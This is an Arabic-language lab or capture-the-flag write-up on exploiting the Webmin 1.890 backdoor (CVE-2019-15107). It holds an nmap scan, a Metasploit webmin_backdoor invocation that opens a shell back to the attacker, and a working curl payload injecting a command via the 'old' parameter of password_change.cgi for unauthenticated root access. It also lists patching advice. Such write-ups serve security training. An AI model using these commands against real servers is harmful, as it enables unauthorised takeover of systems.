
هدف البحث: إجراء تحليل شامل واستغلال ناجح لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في Webmin الإصدار 1.890 (CVE-2019-15107)، والحصول في النهاية على السيطرة الكاملة على النظام المستهدف.
هدف البحث: إجراء تحليل شامل واستغلال ناجح لثغرة تنفيذ الأوامر عن بعد (RCE) في Webmin الإصدار 1.890 (CVE-2019-15107)، والحصول في النهاية على السيطرة الكاملة على النظام المستهدف.
المنهجية:
الاستطلاع الأولي:
تم إجراء مسح الشبكة باستخدام Nmap:
bash nmap -sV -sC -A -p- 10.201.105.185 تم تحديد خدمة Webmin 1.890 قيد التشغيل على المنفذ 10000
تحليل الثغرة:
تم التحقيق في آلية الثغرة في password_change.cgi
تم تأكيد إمكانية تنفيذ الأوامر التعسفية دون مصادقة
الاستغلال:
تم تنفيذ متجهين هجوميين:
bash use exploit/linux/http/webmin_backdoor set RHOSTS 10.201.105.185 set LHOST tun0 exploit
bash curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test" ما بعد الاستغلال:
تم الحصول على شل جذر تفاعلي
تم إجراء تحليل لنظام الملفات
تم اكتشاف ملفات العلم:
bash /home/dark/user.txt /root/root.txt النتائج:
تم استغلال ثغرة CVE-2019-15107 بنجاح
تم الحصول على صلاحيات جذر كاملة على النظام
تم إثبات الأهمية الحاسمة للتحديثات البرمجية في الوقت المناسب
الاستنتاجات الفنية:
تسمح الثغرة بتنفيذ الأوامر التعسفية عبر حقن معامل "old"
غياب فحوصات المصادقة يجعل هذا خطيرًا بشكل خاص
الإصدار 1.890 يحتوي على باب خلفي تم تصحيحه في الإصدارات اللاحقة
التوصيات الأمنية:
الترقية الفورية إلى إصدار Webmin الحالي
تقييد الوصول إلى لوحة الإدارة حسب عنوان IP
إجراء تدقيق أمني منتظم لتطبيقات الويب
اتجاهات البحث المستقبلية:
تحليل ثغرات Webmin الأخرى
تطوير استغلال مخصص بدون Metasploit
التحقيق في تقنيات الثبات في الأنظمة المخترقة
توضح هذه الدراسة حالة الأهمية الحاسمة للتحديثات النظامية في الوقت المناسب وضرورة المراقبة المستمرة للثغرات في البرامج المنشورة. يوفر البحث رؤى عملية حول تقنيات استغلال تطبيقات الويب الحديثة مع التأكيد على مبادئ الأمان الأساسية.